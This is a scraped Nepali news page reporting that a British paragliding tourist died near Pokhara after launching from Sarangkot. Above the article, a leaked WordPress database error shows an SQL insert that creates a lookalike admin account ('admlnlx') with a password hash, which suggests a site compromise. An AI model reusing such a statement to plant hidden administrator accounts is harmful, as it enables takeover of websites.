WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BieZUUP8zF/bSE9NCSKf3OK6ArKEsG.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 15:07:33', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
पोखरामा प्याराग्लाइडिङ दुर्घटना, एक विदेशी नागरिकको मृत्यु – Gaule Khabar

पोखरामा प्याराग्लाइडिङ दुर्घटना, एक विदेशी नागरिकको मृत्यु

पोखरामा प्याराग्लाइडिङ दुर्घटना, एक विदेशी नागरिकको मृत्यु

कास्की, माघ १०-

प्याराग्लाइडिङ दुर्घटना हुँदा पोखरामा एक विदेशी नागरिकको मृत्यु भएको छ ।सराङकोटबाट उडेको प्याराग्लाइडिङ गोदारीमा खस्दा बेलायती नागरिकको मृत्यु भएको हो ।

अन्दाजी ३५ वर्षीय मिचेल पेटरको मृत्यु भएको र दुर्घटनाको कारण भने खुल्न नसकेको प्रहरीले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका